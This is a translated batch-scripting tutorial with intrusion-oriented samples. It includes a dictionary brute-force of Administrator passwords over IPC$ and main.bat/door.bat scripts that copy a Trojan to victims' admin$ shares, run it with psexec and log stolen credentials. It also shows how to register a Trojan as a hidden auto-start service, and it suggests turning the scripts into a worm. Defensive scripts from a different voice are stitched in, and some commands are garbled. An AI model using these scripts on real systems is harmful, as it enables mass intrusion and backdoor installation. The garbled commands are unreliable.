Advanced application skills of batch processing

Time:2021-11-8

Advanced application of batch processing 1
1. Simple batch internal commands
Advanced application of batch processing!! Tips!!!
Batch processing is familiar to everyone!
Here are some knowledge points about batch processing:
1: Skillfully use the FC command as a Trojan-checking tool:
First, create the batch file atm.bat with the following code:
@echo off
dir c:\windows\system32\*.exe >c:??.txt
dir c:\windows\system32\*.dll >c:??.txt
2: Create a batch file wlts.bat with the following code:
@echo off
dir c:\windows\system32\*.exe >c:\findexe.txt
dir c:\windows\system32\*.dll >c:\finddll.txt
fc c:??.txt c:\findexe.txt >c:\exe.txt
fc c:??.txt c:\finddll.txt >c:\dll.txt
In this way, you first run atm.bat on your machine. Later, when you suspect a Trojan, run wlts.bat and then look at C:\exe.txt and C:\dll.txt: the suspicious files are listed there! This is just an idea!! You can also use it to find the garbage files left behind when you uninstall software, and the same goes for the registry!
2: Use the subst command to make a virtual hard drive!
Example:
subst x: c:??
where x is the drive letter and 111 is the folder that becomes the drive.
3: Clever use of the subst command to hide the 3.5" floppy drive:
subst h: c:\atm   (and make the atm folder read-only!)
To restore: Start - Run - subst a: /d. OK!!
1. Echo command
Turns command echoing on or off, or displays a message. With no parameters, the echo command displays the current echo setting.
Syntax
echo [{on|off}] [message]
Sample: @echo off / echo hello world
In practice we combine this command with the redirection symbols (also called pipe symbols; generally >, >> and ^ are used), as later examples will show.
2. @ command
It means that the command after @ is not displayed. During an intrusion (for example, using a batch file to format the enemy's hard disk), the other party cannot see the command you used.
Sample: @echo off
@echo Now initializing the program, please wait a minute...
@format X: /q/u/autoset   (the format command cannot take the /Y parameter; fortunately, Microsoft left us an AUTOSET parameter, whose effect is the same as /Y.)
3. Goto command
Jumps to a label. When the label is found, the program continues with the command on the line after it.
Syntax: goto label   (label is a parameter that specifies the line in the batch program to jump to.)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms   (if you don't understand the if, %1 and %2 here, skip them for now; they are explained in detail later.)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
:end
The label name can be chosen freely, but it is better to use something meaningful. Put a colon before the name to mark it as a label; the goto command looks for that label and jumps there. You should also add some comments so that others can understand your intention.
4. Rem command
The comment command is equivalent to /* ... */ in the C language. It is not executed and only serves as a comment for others to read and for future modification.
Rem Message
Sample: @Rem Here is the description.
5. Pause command
Running the Pause command displays the following message:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into drive A
pause
goto begin
In this example, all files on the disk in drive A are copied to D:\back. The displayed message prompts you to put another disk into drive A; the pause command suspends the program so that you can change the disk, and pressing any key then continues processing.
6. Call command
Calls one batch program from another without terminating the parent batch program. The call command also accepts a label as the call target. Call has no effect when used on the command line outside a script or batch file.
Syntax
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
Parameters
[Drive:][Path] FileName
Specifies the location and name of the batch program to call. The filename parameter must have a .bat or .cmd extension.
7. start command
Calls an external program. All DOS commands and command-line programs can be started with the start command.
Common parameters (in intrusions):
MIN   Start the window minimized
SEPARATE   Start a 16-bit Windows program in a separate memory space
HIGH   Start the application in the HIGH priority class
REALTIME   Start the application in the REALTIME priority class
WAIT   Start the application and wait for it to terminate
parameters   These are the parameters passed to the command/program
If the application executed is a 32-bit GUI application, cmd.exe does not wait for the application to terminate before returning to the command prompt. This new behaviour does not occur if executing within a command script.
8. choice command
The choice command lets the user enter a character so that different commands are run. The /C: parameter should be given, with the characters to prompt for written right after C: without spaces. Its return code (errorlevel) is 1, 2, 3, 4... according to the position of the chosen character.
For example: choice /c:dme defrag,mem,end
will show
defrag,mem,end[D,M,E]?
Sample:
The contents of sample.bat are as follows:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag   (the error code with the highest value must be tested first)
if errorlevel 2 goto mem
if errorlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
After this file runs, it displays defrag,mem,end[D,M,E]? and the user can choose d, m or e. The if statements then test the choice: D runs the program segment labeled defrag, M runs the segment labeled mem, and E runs the segment labeled end. Each segment ends with goto end, which jumps to the end label, after which the program displays good bye and the file ends.

Advanced application of batch processing 2
3. How to use compound commands
1. &
Usage: first command & second command [& third command...]
In this way, multiple commands can be run in one line, regardless of whether each command succeeds or not.
Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14 sometips.gif
2. &&
Usage: first command && second command [&& third command...]
In this way, multiple commands are run in one line; when a command fails, the following commands are not run, and if no command fails, all of them run.
Sample:
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.
C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
This command can be used during backups, which is relatively simple, for example:
dir \\192.168.0.1\database\backup.mdb && copy \\192.168.0.1\database\backup.mdb E:\backup
If backup.mdb exists on the remote server, the copy command runs; if the file does not exist, the copy command does not run. This usage can replace if exist :)
3. ||
Usage: first command || second command [|| third command...]
In this way, multiple commands are run in one line; as soon as a command succeeds, the following commands are not run, and if no command succeeds, all of them run.
Sample:
C:\Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
Example of combining the commands:
sample:
@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt
4. Use of pipe commands
1. | command
Usage: first command | second command [| third command...]
Uses the output of the first command as the input of the second command. This method is very common in UNIX.
sample:
time /t>>D:\IP.log
netstat -n -p tcp|find ":3389">>D:\IP.log
start Explorer
See? Terminal Services lets us customize the program that starts when a user logs in; make it run the above bat and you obtain the IP of the logged-in user.
2. >, >> output redirection commands
Redirect the output of a command or program to a specific file. The difference between > and >> is that > clears the original contents of the file before writing, while >> only appends to the file without changing its existing contents.
sample1:
echo hello world>c:\hello.txt (a stupid example?)
sample2:
Nowadays DLL Trojans are popular. We know that system32 is a good place to play hide and seek; many Trojans squeeze in there, and DLL Trojans are no exception. In view of this, we can record the EXE and DLL files in this directory right after installing the system and the necessary applications:
Run CMD, change directory to system32, then run dir *.exe>exeback.txt & dir *.dll>dllback.txt
In this way, the names of all EXE and DLL files are recorded in exeback.txt and dllback.txt respectively.
Later, if you find something abnormal but cannot locate the problem with the usual methods, consider whether a DLL Trojan has sneaked into the system.
At that point, use the same commands to record the EXE and DLL files under system32 into another pair of files, exeback1.txt and dllback1.txt, and then run:
CMD: fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>>diff.txt (fc compares the DLL and EXE lists before and after; the second fc uses >> so that it does not overwrite the result of the first). In this way we find the extra DLL and EXE files, and by checking their creation time, version and whether they are packed we can easily judge whether a DLL Trojan has paid a visit. None is best. If there is one, don't del it directly: first use regsvr32 /u trojan.dll to unregister the backdoor DLL, then move it to the recycle bin. If the system shows no abnormal reaction, delete it completely or submit it to an anti-virus company.
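The baseline-and-compare idea from this section and from the atm.bat/wlts.bat trick in part 1, as one added batch file that is not from the original article: it snapshots the EXE/DLL names in system32, compares later snapshots with fc, and uses the FOR modifiers %~t and %~z to show the timestamp and size of every name that is new. The directory %SystemRoot%\system32, the storage folder %SystemDrive%\sys32base and the file names are my choices.

```batch
@echo off
rem sys32check.bat (added example, not from the article): keep a baseline of
rem the EXE/DLL names in system32 and compare later snapshots against it with
rem FC, then show timestamp and size of every name that is new.
rem Usage:  sys32check.bat baseline   (once, on a system you trust)
rem         sys32check.bat check      (whenever something looks wrong)
setlocal
set "BASE=%SystemRoot%\system32"
set "STORE=%SystemDrive%\sys32base"
if not exist "%STORE%" mkdir "%STORE%"

if /i "%~1"=="baseline" goto baseline
if /i "%~1"=="check" goto check
echo Usage: %~nx0 baseline ^| check
goto :eof

:baseline
rem /b = bare names, /a-d = files only; sort so that fc sees a stable order
dir /b /a-d "%BASE%\*.exe" | sort > "%STORE%\exe.base"
dir /b /a-d "%BASE%\*.dll" | sort > "%STORE%\dll.base"
echo Baseline written to %STORE%
goto :eof

:check
if not exist "%STORE%\exe.base" (
  echo No baseline yet, run "%~nx0 baseline" first
  goto :eof
)
dir /b /a-d "%BASE%\*.exe" | sort > "%STORE%\exe.now"
dir /b /a-d "%BASE%\*.dll" | sort > "%STORE%\dll.now"
for %%T in (exe dll) do (
  rem fc /l compares as text; its errorlevel is 1 when the lists differ and
  rem "if errorlevel 1" is true for 1 or anything higher (2 = file error)
  fc /l "%STORE%\%%T.base" "%STORE%\%%T.now" > "%STORE%\%%T.diff"
  if errorlevel 1 (
    echo %%T list changed, full comparison in %STORE%\%%T.diff
    call :shownew %%T
  ) else (
    echo %%T list unchanged
  )
)
goto :eof

:shownew
rem Names present now but absent from the baseline: findstr /v /x /i /l /g:
rem prints the lines of the second file that match no literal line of the
rem first. %%~tG and %%~zG are the FOR modifiers for file date/time and size.
for /f "usebackq delims=" %%F in (`findstr /v /x /i /l /g:"%STORE%\%1.base" "%STORE%\%1.now"`) do (
  for %%G in ("%BASE%\%%F") do echo   NEW %1: %%~tG  %%~zG bytes  %%~fG
)
goto :eof
```

A name that is new is only a lead: compare its version information and signature before deciding, as the text above advises.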
3. <, >&, <&
<   Reads command input from a file instead of the keyboard.
>&   Writes the output of one handle to the input of another handle.
<&   Reads the input from one handle and writes it to the output of another handle.
These are not commonly used, so I won't introduce them further.
5. How to operate the registry with batch files
During an intrusion, specific registry keys are often manipulated for certain purposes: for example, to hide a backdoor or Trojan by deleting its leftover value under Run, or to create a service that loads the backdoor. Of course, we also modify the registry to harden the system or change some property of the system, which requires a certain understanding of the registry. Now let's learn how to operate the registry with .reg files (we can generate a .reg file from a batch file).
The common registry operations are creation, modification and deletion.
1. Creation
There are two kinds of creation. One is to create a subkey:
We create a file with the following contents:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
Then run the script, and a subkey named "hacker" is created under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft.
The other is to create values (item names).
This file format is the typical one, identical to the format exported by the registry editor. The contents are as follows:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"="C:\\WINNT\\system32\\door.exe"
"Autodos"=dword:00000002
This creates three new values under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]: Invader, Door and Autodos.
The type of Invader is "string value"
The type of Door is "REG_SZ value"
The type of Autodos is "DWORD value"
2. Modification
Modification is simple: export the key you need to modify, edit it with Notepad, and import it again (regedit /s).
3. Deletion
Let's first look at deleting a value. We create a file as follows:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
Run the script, and the "Ex4rch" value under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] is deleted.
Now let's look at deleting a subkey. We create a script as follows:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
After running the script, [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] has been deleted.
I believe you have now basically mastered .reg files. So the goal now is to create .reg files with specific contents from a batch file. Remember what we said earlier: with the redirection symbols we can easily create files of a specific type.
Sample1: as in the example above, if you want to generate the following registry file:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"="C:\\WINNT\\system32\\door.exe"
"Autodos"=dword:00000002
just do this:
@echo off
>Sample.reg echo Windows Registry Editor Version 5.00
>>Sample.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
>>Sample.reg echo "Invader"="Ex4rch"
>>Sample.reg echo "Door"="C:\\WINNT\\system32\\door.exe"
>>Sample.reg echo "Autodos"=dword:00000002
(The first line uses > to create the file and the rest use >> to append. The redirection is written before echo because a digit directly in front of > or >>, as in "5.00>Sample.reg", is taken by cmd as a handle number and redirects the wrong stream.)
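The same echo-and-redirect technique applied to the clean-up case mentioned at the start of part 1 (a leftover entry under Run), as an added batch file that is not from the original article: it exports the key with regedit /e before touching it, generates a "Name"=- delete script with echo, imports it with regedit /s and verifies with reg query. The working folder %TEMP%\cleanrun, the file names and the value name passed on the command line are my assumptions.

```batch
@echo off
rem cleanrun.bat (added example, not from the article): delete one leftover
rem value from the HKLM Run key by generating a .reg file with echo, after
rem exporting the key with regedit /e so that the change can be undone.
rem Usage:  cleanrun.bat ValueName      (run from an administrator prompt)
setlocal
if "%~1"=="" (
  echo Usage: %~nx0 ValueName
  goto :eof
)
set "KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
set "NAME=%~1"
set "WORK=%TEMP%\cleanrun"
set "BACKUP=%WORK%\Run-backup.reg"
set "SCRIPT=%WORK%\delete.reg"
if not exist "%WORK%" mkdir "%WORK%"

rem 1. Refuse to act on a value that is not there (reg query returns 1)
reg query "%KEY%" /v "%NAME%" >nul 2>&1
if errorlevel 1 (
  echo No value named "%NAME%" under Run, nothing to do
  goto :eof
)

rem 2. Backup: regedit /e exports the key as a .reg that can be re-imported
if exist "%BACKUP%" del "%BACKUP%"
regedit /e "%BACKUP%" "%KEY%"
if not exist "%BACKUP%" (
  echo Backup failed, not touching the registry
  goto :eof
)

rem 3. Generate the delete script: > creates the file, >> appends to it.
rem    The redirection is written before echo on purpose: a digit directly
rem    in front of > (as in "5.00>file") is taken as a handle number.
rem    "Name"=- deletes a value; [-Key] would delete the whole key.
> "%SCRIPT%" echo Windows Registry Editor Version 5.00
>>"%SCRIPT%" echo.
>>"%SCRIPT%" echo [%KEY%]
>>"%SCRIPT%" echo "%NAME%"=-

rem 4. Show what will be imported, then import silently (/s = no prompt)
type "%SCRIPT%"
regedit /s "%SCRIPT%"

rem 5. Verify: the value should be gone now
reg query "%KEY%" /v "%NAME%" >nul 2>&1
if errorlevel 1 (
  echo Removed "%NAME%" from Run. Undo with: regedit /s "%BACKUP%"
) else (
  echo "%NAME%" is still present; check that this prompt is elevated
)
endlocal
```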
Sample2:
When using some older Trojans, we may create a value under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (RunOnce, RunServices, RunExec)] in the registry to make the Trojan start automatically. However, this easily exposes the path of the Trojan program and gets it killed; by comparison, registering the Trojan as a system service is relatively safe. The following takes a configured IRC Trojan, dsnx, as an example (named windrv32.exe):
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@del patch.dll
@REM [delete the startup value of dsnxde in the registry, register it as a critical system service with sc.exe, set its attributes to hidden and read-only, and configure it to start automatically]
@REM Isn't it safer ^_^
Some good tricks! (they can be called classics)
1. If many windows are open and you want to close them all, hold down Shift and click the close icon in the upper right corner of the window.
2. Before saving a web page, press the "ESC" key (or work offline) and then save it, so that it saves quickly.
3. You can listen to a CD on a computer without any player software: connect the speaker cable directly to the headphone jack of the optical drive, insert a CD and press the play button on the drive, so listening to music uses no system resources. (For example, if your computer is broken, cannot boot and will not be repaired for a while, don't let it go to waste: power the CD drive from the PC's power supply and you have a temporary CD player.)
4. In MSN, pressing Enter sends the message. If you want a new line without sending, use Shift+Enter or Ctrl+Enter.
5. Short HTML code can be tested in the browser's address bar: type about:abc in the address bar, press Enter and you will see the effect.
6. Windows shortcuts:
Win+M   Show desktop
Win+Pause   System properties
Quick restart: hold Shift before clicking OK (not applicable to 2K and XP)
Shift+Del   Delete permanently
Hold Shift when inserting a disc to stop it from auto-running
Ctrl+Esc: equivalent to the Start button or the Win key
Ctrl+Home: move the cursor to the beginning of the text editing area (Home: move to the start of the line)
Ctrl+End: move the cursor to the end of the text editing area (End: move to the end of the line)
Alt+F4: close the current window (if you click the desktop and press it, the system shuts down)
F2: rename
Win+E   Explorer
Win+R   Run
Win+F   Find
Win+U   Shut down the system
Win+D minimizes all windows; pressing Win+D again restores the windows as they were
Win+M minimizes all windows, but pressing it again does not restore them
Shift+F10 opens the right-click menu of the selected item
Hold Ctrl+Shift while dragging a file: creates a shortcut
7. Shutdown shortcut
(1). Right-click an empty spot on the desktop -> <New> -> choose <Shortcut>
(2). In <Command line> type rundll.exe user.exe,exitwindows
(3). In <Select a name for the shortcut> type <Shut down> or any name you like -> click <Finish>
8. Restart shortcut
(1). Repeat step (1) above
(2). In <Command line> type rundll.exe user.exe,exitwindowsexec
(3). In <Select a name for the shortcut> type <Restart> or any name you like -> click <Finish>
9. Run -> cmd or command
You will see the DOS window. Have you noticed the small icon in the upper left corner? Click it and you will see a drop-down menu; the functions under Edit in particular are very convenient.
10. con and nul are reserved names in MS systems and cannot be used as file names! To check whether your web space runs on an M$ system, try creating a folder named con.
11. Want a list of the files in one of your folders? What software do you use? None: on the command line, just type "tree /f >index.txt", then open index.txt and everything is clear at a glance.
12. To save a borderless (pop-up) web page, use Ctrl+N to open it in a new window first.

Advanced application of batch processing 3
9. If command
if judges whether the specified condition is met, so as to decide which commands to run. There are three forms:
1. if "parameter"=="string" command
If the parameter equals the specified string, the condition is true and the command runs; otherwise the next line runs. (Note the two equal signs.)
For example: if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2. if exist filename command
If the specified file exists, the condition is true and the command runs; otherwise the next line runs.
For example: if exist config.sys edit config.sys
3. if errorlevel / if not errorlevel number command
If the return code is equal to the specified number, the condition is true and the command runs; otherwise the next line runs.
For example: if errorlevel 2 goto x2
When a DOS program runs, it returns a number to DOS, called the error code (errorlevel) or return code. The common return codes are 0 and 1.
10. for command
The for command is a complex command, mainly used to run a command repeatedly for each item in a specified set of parameters.
To use FOR in a batch file, specify the variable as %%variable.
for {%variable|%%variable} in (set) do command [command-parameters]
%variable   Specifies a single-letter replaceable parameter.
(set)   Specifies a file or a set of files. Wildcards can be used.
command   Specifies the command to run for each file.
command-parameters   Specifies parameters or switches for the specified command.
To use FOR in a batch file, specify the variable as %%variable instead of %variable. Variable names are case sensitive, so %i is different from %I.
If command extensions are enabled, the following additional forms of the FOR command are supported:
FOR /D %variable IN (set) DO command [command-parameters]
If set contains wildcards, it matches directory names instead of file names.
FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]
Walks the directory tree rooted at [drive:]path, running the FOR statement in each directory of the tree. If no directory is specified after /R, the current directory is used. If set is just a single period (.), it enumerates the directory tree.
FOR /L %variable IN (start,step,end) DO command [command-parameters]
The set is a sequence of numbers from start to end in steps of step. So (1,1,5) generates the sequence 1 2 3 4 5, and (5,-1,1) generates the sequence (5 4 3 2 1).
FOR /F ["options"] %variable IN (file-set) DO command [command-parameters]
FOR /F ["options"] %variable IN ("string") DO command [command-parameters]
FOR /F ["options"] %variable IN ('command') DO command [command-parameters]
or, if the usebackq option is present:
FOR /F ["options"] %variable IN (file-set) DO command [command-parameters]
FOR /F ["options"] %variable IN ('string') DO command [command-parameters]
FOR /F ["options"] %variable IN (`command`) DO command [command-parameters]
filenameset is one or more file names. Each file in filenameset is opened, read and processed before going on to the next file. Processing consists of reading the file, breaking it into individual lines of text and then parsing each line into zero or more tokens. The body of the for loop is then called with the variable value(s) set to the token string(s) found. By default, /F passes the first blank-separated token of each line of each file. Blank lines are skipped. You can override the default parsing behaviour by specifying the optional "options" parameter. This is a quoted string containing one or more keywords that specify different parsing options. The keywords are:
eol=c   - specifies an end-of-line comment character (just one)
skip=n   - specifies the number of lines to skip at the beginning of the file.
delims=xxx   - specifies a delimiter set. This replaces the default delimiter set of space and tab.
tokens=x,y,m-n   - specifies which tokens of each line are passed to the for body on each iteration. This causes additional variable names to be allocated. The m-n form is a range, specifying the mth through the nth tokens. If the last character of the tokens= string is an asterisk, an additional variable is allocated and receives the remaining text of the line after the last token parsed.
usebackq   - specifies that the new semantics are in force: a back-quoted string is executed as a command, a single-quoted string is a literal string, and double quotes may be used to quote file names in filenameset.
sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
would parse each line in myfile.txt, ignoring lines that begin with a semicolon, and pass the second and third tokens of each line to the for body, with tokens delimited by commas and/or spaces. Notice that the for body references %i to get the second token, %j to get the third token, and %k to get all remaining tokens after the third. For file names that contain spaces, you need to enclose the file name in double quotes. In order to use double quotes this way, you also need to use the usebackq option, otherwise the double quotes are interpreted as defining a literal string to parse.
%i is explicitly declared in the for statement, and %j and %k are implicitly declared via the tokens= option. You can specify up to 26 tokens via the tokens= line, provided it does not cause an attempt to declare a variable higher than the letter z or Z. Remember, FOR variables are single-letter, case sensitive and global, and no more than 52 can be active at any one time.
You can also use the FOR /F parsing logic on an immediate string, by making the filenameset between the parentheses a quoted string, using single quote characters. It is then treated as a single input line from a file.
Finally, you can use the FOR /F command to parse the output of a command. You do this by making the filenameset between the parentheses a back-quoted string. The string is passed to a child cmd.exe as a command line, and its output is captured into memory and parsed as if it were a file. So the following example:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
enumerates the environment variable names in the current environment.
In addition, substitution of FOR variable references has been enhanced. You can now use the following option syntax:
%~I   - expands %I removing any surrounding quotes (")
%~fI   - expands %I to a fully qualified path name
%~dI   - expands %I to a drive letter only
%~pI   - expands %I to a path only
%~nI   - expands %I to a file name only
%~xI   - expands %I to a file extension only
%~sI   - expanded path contains short names only
%~aI   - expands %I to the file attributes of the file
%~tI   - expands %I to the date/time of the file
%~zI   - expands %I to the size of the file
%~$PATH:I   - searches the directories listed in the PATH environment variable and expands %I to the fully qualified name of the first one found. If the environment variable name is not defined or the file is not found by the search, this modifier expands to the empty string.
The modifiers can be combined to get compound results:
%~dpI   - expands %I to a drive letter and path only
%~nxI   - expands %I to a file name and extension only
%~fsI   - expands %I to a full path name with short names only
%~dp$PATH:I   - searches the directories listed in the PATH environment variable for %I and expands to the drive letter and path of the first one found.
%~ftzaI   - expands %I to a DIR-like output line
In the above examples %I and PATH can be replaced by other valid values. The %~ syntax is terminated by a valid FOR variable name. Picking upper-case variable names like %I makes it more readable and avoids confusion with the modifiers, which are not case sensitive.
The above is the official help from MS. Let's give several examples to illustrate the use of the for command in intrusion.
sample2:
Use the for command to brute-force the password of a target Win2K host.
We use net use \\ip\ipc$ "password" /u:"Administrator" to try to connect to the target host, and write down the password when it succeeds.
The main command is one line: for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
i% represents the admin password: take each value of i% from dict.txt and connect with the net use command. Then pass the result of the program to the find command:
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ": command completed successfully" >>D:\ok.txt, and that's it, KO.
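As an added example that is not part of the original article, here is the logging idea from section 4 (the netstat | find ":3389" sample) rewritten with FOR /F so that only established connections to the local RDP port are recorded, using tokens=, usebackq and a back-quoted command as described in the help above. The default log path D:\IP.log comes from the article; the helper label :log and the variable names are my assumptions.

```batch
@echo off
rem rdplog.bat (added example, not from the article): append one line per
rem established TCP connection to the local RDP port, parsed with FOR /F
rem from netstat output, instead of dumping the raw netstat lines.
rem Usage:  rdplog.bat [logfile]      default log is D:\IP.log as in the article
setlocal
set "LOG=%~1"
if "%LOG%"=="" set "LOG=D:\IP.log"
set "PORT=3389"
set "COUNT=0"

rem netstat -n -p tcp prints:   TCP   local:port   remote:port   STATE
rem tokens=1-4 binds %%a=proto %%b=local %%c=remote %%d=state; usebackq makes
rem the back-quoted text run as a command. The outer loop repeats the parse
rem for IPv6 (tcpv6); 2^>nul hides the error on systems without IPv6 support.
for %%P in (tcp tcpv6) do (
  for /f "usebackq tokens=1-4" %%a in (`netstat -n -p %%P 2^>nul`) do (
    if /i "%%d"=="ESTABLISHED" (
      rem does the local endpoint end in the RDP port? findstr /r anchors it with $
      echo %%b| findstr /r /c:":%PORT%$" >nul && call :log "%%c" "%%a"
    )
  )
)
echo %COUNT% RDP connection(s) written to %LOG%
goto :eof

:log
rem %~1 = remote addr:port, %~2 = protocol; %date% %time% stamp the entry
>>"%LOG%" echo %date% %time% %~2 RDP session from %~1
set /a COUNT+=1
goto :eof
```

Run it from a scheduled task or a logon script to build a history of which remote addresses held RDP sessions and when.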
sample3:
Have you ever had a lot of zombies (broilers) waiting for you to plant a backdoor + Trojan? When the number is very large, what was a happy thing becomes very depressing :). At the beginning of the article we talked about using batch files to simplify daily or repetitive tasks. So how do we do it? Hehe, you'll see.
There is only one main command (in a batch file, the FOR command's variable is written as %%variable):
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
For the usage of tokens, see sample1 above. Here it means passing the contents of victim.txt, in order, as the parameters %i %j %k of door.bat.
door.bat does nothing more than use the net use command to establish the IPC$ connection, copy the Trojan + backdoor to the victim, and then use the return code (if errorlevel =) to filter the hosts where the backdoor was planted successfully and echo them out, or echo them to a specified file.
delims= indicates that the contents of victim.txt are separated by spaces. I think you must understand what victim.txt contains by now: it should follow what %%i %%j %%k represent, generally ip password username.
Code prototype:
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos mode.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
This is just a prototype of an automatic backdoor-planting batch. The two batch files, the backdoor program (windrv32.exe) and psexec.exe need to be placed in one directory. The batch contents can also be expanded, for example by adding functions for clearing logs + DDoS and adding users on a schedule, which could give it the ability to propagate automatically (worm). No more is described here; interested friends can study it by themselves.
2. How to use parameters in batch files
Parameters can be used in batch files, generally %1 to %9. When there are more parameters, shift is needed to move them along. That is rare, so we won't consider it.
sample1: fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/autoset
@echo please insert another disk to drive A.
@pause
@goto format
This example is used to format several floppy disks one after another, so you need to type fomat.bat a in the DOS window. Hehe, it seems a little superfluous ~^_^
sample2:
When we want to establish an IPC$ connection, we always have to type a long series of commands, and one typo means starting over. So we might as well write the fixed commands into a batch file and pass the zombie's IP address, password and username to it as parameters, so that we don't have to type the commands every time.
@echo off
@net use \\%1\ipc$ "%2" /u:"%3"   (note that the password here is the second parameter)
@if errorlevel 1 echo connection failed
How about using parameters? Isn't it relatively simple? You must have learned it by now, handsome.